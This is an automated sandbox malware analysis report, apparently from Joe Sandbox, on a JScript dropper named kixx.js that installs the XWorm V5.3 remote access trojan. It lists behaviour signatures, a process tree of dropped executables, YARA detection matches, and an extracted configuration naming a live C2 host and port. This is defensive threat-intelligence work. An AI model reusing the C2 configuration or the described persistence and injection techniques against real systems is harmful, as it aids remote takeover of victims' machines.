Edit tour

Windows Analysis Report
kixx.js

Overview

General Information

Sample name:	kixx.js
Analysis ID:	1523187
MD5:	3094dc3bf3dacc07b7ae62e6cb53e02d
SHA1:	7ff5441adf6b751704534c979046d5698dfdfdb1
SHA256:	8fa2ab71f2e7c4276167c217778c01dedf71053bf9d4cee5274e8c077ef327dd
Tags:	192-210-215-11jsuser-JAMESWT_MHT
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Found malware configuration

JScript performs obfuscated calls to suspicious functions

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected XWorm

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Contains functionality to disable the Task Manager (.Net Source)

Creates multiple autostart registry keys

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: WScript or CScript Dropper

Uses dynamic DNS services

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5628 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kixx.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

fzP.exe (PID: 2748 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

fzP.exe (PID: 3812 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

fzP.exe (PID: 4308 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

fzP.exe (PID: 6984 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

fzP.exe (PID: 652 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

fzP.exe (PID: 3996 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

fzP.exe (PID: 4052 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

fzP.exe (PID: 4668 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

Service.exe (PID: 6984 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

Service.exe (PID: 1856 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

Service.exe (PID: 5348 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

Service.exe (PID: 6284 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

Service.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

Service.exe (PID: 2468 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

Service.exe (PID: 1360 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

Service.exe (PID: 6512 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

Service.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

Service.exe (PID: 2968 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

Service.exe (PID: 5796 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

Service.exe (PID: 3560 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

fzP.exe (PID: 5396 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

fzP.exe (PID: 5804 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

fzP.exe (PID: 4708 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

fzP.exe (PID: 1196 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

fzP.exe (PID: 2260 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

fzP.exe (PID: 5572 cmdline: "C:\Users\user\AppData\Local\Temp\fzP.exe" MD5: E69512E47D3A857DE921FDB578CC6143)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["kizitodavina.duckdns.org"], "Port": "8645", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.3"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2185105429.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000005.00000002.2185105429.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x78f8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7995:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7aaa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x75a6:$cnc4: POST / HTTP/1.1
0000000B.00000002.2241713561.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.2241713561.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2427c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2d4c0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3671c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3fe78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x24319:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2d55d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x367b9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3ff15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2442e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2d672:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x368ce:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4002a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x23f2a:$cnc4: POST / HTTP/1.1 0x2d16e:$cnc4: POST / HTTP/1.1 0x363ca:$cnc4: POST / HTTP/1.1 0x3fb26:$cnc4: POST / HTTP/1.1
00000004.00000002.2158395639.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000004.00000002.2158395639.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2a488:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x336cc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3c928:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x46090:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6ae84:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x740c8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7d324:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x86a80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xab874:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xb4ab8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbdd14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc7470:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xec264:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf54a8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xfe704:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x107e60:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2a525:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x33769:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3c9c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4612d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6af21:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
0000000B.00000002.2241713561.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.2241713561.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x51e50:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5b094:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x642f0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6dc4c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x984a0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa16e4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xaa940:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xb40a8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xd8e9c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe20e0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeb33c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf4a98:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11988c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x122ad0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12bd2c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x51eed:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5b131:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6438d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6dce9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9853d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa1781:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
00000002.00000002.2048562319.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000002.2048562319.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x51e40:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5b084:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x642e0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6dc38:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x51edd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5b121:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6437d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6dcd5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x51ff2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5b236:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x64492:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6ddea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x51aee:$cnc4: POST / HTTP/1.1 0x5ad32:$cnc4: POST / HTTP/1.1 0x63f8e:$cnc4: POST / HTTP/1.1 0x6d8e6:$cnc4: POST / HTTP/1.1
Process Memory Space: fzP.exe PID: 2748	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: fzP.exe PID: 4308	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: fzP.exe PID: 6984	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: Service.exe PID: 1360	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.fzP.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
5.2.fzP.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7af8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7b95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7caa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x77a6:$cnc4: POST / HTTP/1.1
2.2.fzP.exe.3232718.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.2.fzP.exe.3232718.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10728:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1996c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x22bc8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2c520:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x107c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x19a09:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x22c65:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2c5bd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x108da:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x19b1e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x22d7a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2c6d2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x103d6:$cnc4: POST / HTTP/1.1 0x1961a:$cnc4: POST / HTTP/1.1 0x22876:$cnc4: POST / HTTP/1.1 0x2c1ce:$cnc4: POST / HTTP/1.1
11.2.Service.exe.2ddc78c.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.Service.exe.2ddc78c.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xeaf0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x17d34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x20f90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2a6ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeb8d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x17dd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2102d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2a789:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xeca2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x17ee6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x21142:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2a89e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe79e:$cnc4: POST / HTTP/1.1 0x179e2:$cnc4: POST / HTTP/1.1 0x20c3e:$cnc4: POST / HTTP/1.1 0x2a39a:$cnc4: POST / HTTP/1.1
2.2.fzP.exe.3235fac.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.2.fzP.exe.3235fac.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xce94:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x160d8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1f334:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28c8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcf31:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16175:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1f3d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x28d29:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xd046:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1628a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1f4e6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x28e3e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xcb42:$cnc4: POST / HTTP/1.1 0x15d86:$cnc4: POST / HTTP/1.1 0x1efe2:$cnc4: POST / HTTP/1.1 0x2893a:$cnc4: POST / HTTP/1.1
11.2.Service.exe.2ddab48.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.Service.exe.2ddab48.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10734:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x19978:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x22bd4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2c330:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x107d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x19a15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x22c71:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2c3cd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x108e6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x19b2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x22d86:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 